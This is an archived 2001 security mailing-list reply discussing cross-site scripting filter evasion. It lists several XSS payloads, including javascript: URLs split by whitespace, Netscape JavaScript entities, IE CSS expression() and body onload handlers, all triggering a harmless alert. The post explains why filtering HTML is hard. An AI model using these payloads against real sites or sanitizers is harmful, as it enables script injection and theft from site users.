|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Sverre H. Huseby (shh
thathost.com)Date: Tue Oct 23 2001 - 13:58:27 CDT
[Jeremiah Grossman]
| <IMG SRC="javascript:javascript_expression">
And both Netscape and IE accept the following variations with white
space:
<img src="java
script:alert('script');">
<img src="java	script:alert('script');">
| <IMG SRC="&{javascript_expression};">
That stupid Netscape JavaScript Entity works almost everywhere, like
in
<br size="&{alert('script');};">
And there are more: IE runs script code when given the following
constructs:
<p style="left:expression(eval('alert(\'script\')'))">
<style type="text/css">
import url(javascript:alert('script'));</style>^^
Netscape, Mozilla and MSIE allow body tags anywhere, to be nice I
guess, but the problem is that body tags may contain scripts too:
<body onload="alert('script')">
I guess there are plenty more. And I guess every browser (yes, there
are more than Netscape and MSIE) has additional peculiarities (how do
you spell that word?) too. Who said secure web development was
supposed to be easy? Allowing some HTML tags without allowing
scripting is extremely difficult. I've never dared to implement it.
Sverre.
-- shh
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]